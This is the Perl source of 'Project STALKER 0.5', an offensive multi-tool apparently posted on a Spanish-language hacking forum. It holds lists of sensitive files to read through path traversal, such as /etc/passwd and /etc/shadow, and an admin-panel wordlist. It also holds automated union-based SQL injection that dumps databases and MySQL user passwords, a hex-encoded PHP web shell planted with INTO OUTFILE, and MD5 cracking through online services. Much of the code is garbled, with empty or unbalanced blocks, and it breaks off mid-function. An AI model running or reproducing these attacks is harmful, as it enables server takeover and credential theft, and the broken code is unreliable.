Código
#!usr/bin/perl #Project STALKER 0.5 #Coded By Doddy H # #ppm install http://www.bribes.org/perl/ppm/DBI.ppd #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd # use IO::Socket; use HTML::LinkExtor; use LWP::UserAgent; use Win32::Process; use Net::FTP; use Cwd; use MIME::Base64; use DBI; use Color::Output; Color::Output::Init my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'); @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); unless (-d "/logs/webs") { } my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); getinfo(); $SIG{INT} = \&next; while(1) { cprint "\x037"; #13 menujo(); cprint "\x030"; } sub getinfo { $so = $^O; $login = Win32::LoginName(); $domain = Win32::DomainName(); cprint "\x0313"; #13 cprint "\x030"; } sub menujo { if ($cmd=~/getinfo/ig) { getinfo(); } if ($cmd =~/getip (.*)/) { my $te = $1; if ($te eq "" or $te eq " ") { } } elsif ($cmd =~/getlink (.*)/) { $code = toma($1); my @re = get_links($code); for my $url(@re) { } } elsif ($cmd=~/help/) { helpme(); } elsif ($cmd=~/getprocess/) { my %re = getprocess(); ($proceso,$pid) = ($t=~/(.*):(.*)/ig); } } elsif ($cmd=~/killprocess (.*) (.*)/) { if (killprocess($1,$2)) { } } elsif ($cmd=~/conec (.*) (.*) (.*)/) { } elsif ($cmd=~/allow (.*)/) { $re = conectar($1,"80","GET / HTTP/1.0\r\n"); if ($re=~/Allow:(.*)/ig) { }} elsif ($cmd=~/paths (.*)/) { scanpaths($1); } elsif ($cmd=~/encodehex (.*)/) { } elsif ($cmd=~/decodehex (.*)/) { } elsif ($cmd=~/download (.*) (.*)/) { my $file,$name = $1,$2; if (download($1,$2)) { } } elsif ($cmd=~/encodeascii (.*)/) { } elsif ($cmd=~/decodeascii (.*)/) { } elsif ($cmd=~/encodebase (.*)/) { } elsif ($cmd=~/decodebase (.*)/) { } elsif ($cmd=~/aboutme/) { aboutme(); } elsif ($cmd=~/scanport (.*)/) { scanport($1); } elsif ($cmd=~/panel (.*)/) { scanpanel($1); } elsif ($cmd=~/scangoogle/) { my @links = google($dork,$pages); for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} } elsif ($cmd=~/getpass (.*)/) { crackit($1); } elsif ($cmd=~/ftp (.*) (.*) (.*)/) { ftp($1,$2,$3); } elsif ($cmd=~/navegator/) { nave: if ($rta=~/list/) { my @files = coleccionar(getcwd()); for(@files) { if (-f $_) { } else { }}} if ($rta=~/cd (.*)/) { my $dir = $1; } else { }} if ($rta=~/del (.*)/) { my $file = getcwd()."/".$1; if (-f $file) { } else { } } else { } else { }}} } else { }} my $file = $1; #system(getcwd()."/".$file); } if ($rta=~/help/) { } next; } goto nave; } elsif ($cmd=~/kobra (.*)/) { my $url = $1; scansqli($url,"--"); } elsif ($cmd=~/mysql (.*) (.*) (.*)/) { enter($1,$2,$3); } copyright(); <stdin>; } else { } #print "\n\n"; } sub scansqli { my $page = $_[0]; ($pass1,$bypass2) = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } else { my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { motor($page,$_[1]); } else { if ($op eq "y") { motor($page,$_[1]); } else { #head(); #menu(); }}}} sub motor { my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { &menu_options($gen,$pass,$save); } else { } } my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); } } } sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); } else { savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { savefile($save.".txt","[information_schema.tables] : ON"); } else { savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { } } } sub menu_options { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($rta=~/help/) { commands : details tables columns dbs othertable othercolumn mysqluser dumper createshell readfile logs exit ); } if ($rta =~/tables/) { schematables($_[0],$_[1],$save); &reload; } elsif ($rta =~/columns (.*)/) { my $tabla = $1; schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($rta =~/dbs/) { &schemadb($_[0],$_[1],$save); &reload; } elsif ($rta =~/othertable (.*)/) { my $data = $1; &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($rta =~/othercolumn (.*) (.*)/){ my ($db,$table) = ($1,$2); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($rta =~/mysqluser/) { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($rta=~/logs/) { $t = "logs/webs/$save.txt"; &reload; } next; } elsif($rta=~/createshell/) { &into($_[0],$_[1],$path,$save); } elsif($rta=~/readfile/) { loadfile($_[0],$_[1],$save); } elsif ($rta=~/dumper (.*) (.*) (.*)/) { my ($tabla,$col1,$col2) = ($1,$2,$3); &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($rta =~/details/) { &details($_[0],$_[1],$save); &reload; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { } } sub reload { &menu_options($_[0]); } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; savefile($save.".txt","[+] Databases Length : $limita\n"); $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($_[3].".txt","[Table $real Found : $table ]"); $real++; }} } else { }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { } } savefile($_[5].".txt","\n"); my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); } else { last; &reload; } } } else { }}} sub loadfile { savefile($_[2].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }} &reload; } sub into { my ($page,$bypass,$dir,$save) = @_; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $path1 = $1; my $path2 = $path1; $shell = $dir."/"."shell.php"; if ($page =~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2); $code1 = toma("http://".$auth."/".$path2."/"."shell.php"); if ($code1=~/Mini Shell By Doddy/ig) { savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php"); } else { } } } &reload; } sub bypass { sub ascii { } sub base { $re = encode_base64($_[0]); } sub base_de { $re = decode_base64($_[0]); } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { return true; }}} sub hex_en { my $string = $_[0]; $hex = '0x'; } } sub hex_de { $text =~ s/^0x//; } sub ascii_de { } sub getprocess { my %procesos; my $uno = Win32::OLE->new("WbemScripting.SWbemLocator"); my $dos = $uno->ConnectServer("","root\\cimv2"); foreach my $pro (in $dos->InstancesOf("Win32_Process")){ $procesos{$pro->{Caption}} = $pro->{ProcessId}; } } sub killprocess { my ($numb,$pid) = @_; if (Win32::Process::KillProcess($pid,$numb)) { return true; } else { return false; } } sub getip { } sub crackit { my $secret = $_[0]; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', } ); for my $data(keys %hash) { if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; saveyes("logs/pass-found.txt",$secret.":".$1); } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { saveyes("logs/pass-found.txt",$secret.":".$1); } } } print "\n[+] Finish\n"; } sub ftp { my ($ftp,$user,$pass) = @_; if (my $socket = Net::FTP->new($ftp)) { if ($socket->login($user,$pass)) { print "\n[+] Enter of the server FTP\n\n"; menu: print "\n\nftp>"; chomp (my $cmd = <stdin>); print "\n\n"; if ($cmd=~/help/) { print q( help : show information cd : change directory <dir> dir : list a directory mdkdir : create a directory <dir> rmdir : delete a directory <dir> pwd : directory 